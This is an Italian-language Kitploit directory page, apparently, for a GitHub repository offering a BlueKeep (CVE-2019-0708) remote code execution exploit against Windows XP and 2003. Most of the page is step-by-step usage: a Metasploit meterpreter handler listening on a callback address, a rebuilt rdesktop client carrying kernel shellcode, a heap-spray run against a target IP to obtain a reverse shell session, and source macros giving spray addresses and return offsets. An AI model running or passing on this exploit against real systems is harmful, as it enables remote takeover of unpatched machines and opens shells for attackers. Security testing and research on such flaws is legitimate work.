Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2019-0708_bluekeep_rce — funziona su xp (tutte le versioni sp2 sp3) | Kitploit
Strumenti/GitHubGitHub/coolboy4me/cve-2019-0708_bluekeep_rce
Analisi delle VulnerabilitàExploitShellcodePenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubcoolboy4me/cve-2019-0708_bluekeep_rce

cve-2019-0708_bluekeep_rce

funziona su xp (tutte le versioni sp2 sp3)

Vedi Repository
7514117 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
  1. Esegui msfconsole meterpreter/multi/handler in ascolto su 192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. Modifica config, configura l'IP e la porta per la connessione di ritorno 192.168.116.133 6000
  4. Esegui ./heap_spray 192.168.116.134 (134 è l'indirizzo di XP, memoria >= 2 GB)
  5. msfconsole meterpreter otterrà una sessione

ps: shellcode/shellcode.asm è il codice sorgente dello shellcode kernel, compilato e convertito in binario, diventa il file rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b, verrà compilato direttamente nel programma durante il make.

Attualmente supporta solo XP, necessita di XP con memoria >= 2 GB

Per supportare 2003, è necessario modificare il macro HEAP_SPRAY_ADDRESS in heap_spray.c, dopo ripetuti test, questo indirizzo varia in base alle diverse versioni di sistema e dimensioni di memoria di 2003. Ma se si testa sulla propria macchina, è possibile sfruttare con successo su 2003. Non è universale.

heap_spray.c

#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 // Devi trovare l'indirizzo dello shellcode heap spray tramite debug con windbg. Se qualcuno trova una soluzione universale, benvenuto a inviare issue

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

Test su 2003

  1. Esegui msfconsole meterpreter/multi/handler in ascolto su 192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. Modifica config, configura l'IP e la porta per la connessione di ritorno 192.168.116.133 6000
  4. Esegui ./_2003_heap_spray 192.168.116.135 (135 è l'indirizzo di 2003, memoria >= 2 GB)
  5. msfconsole meterpreter otterrà una sessione

login

Scarica lo strumento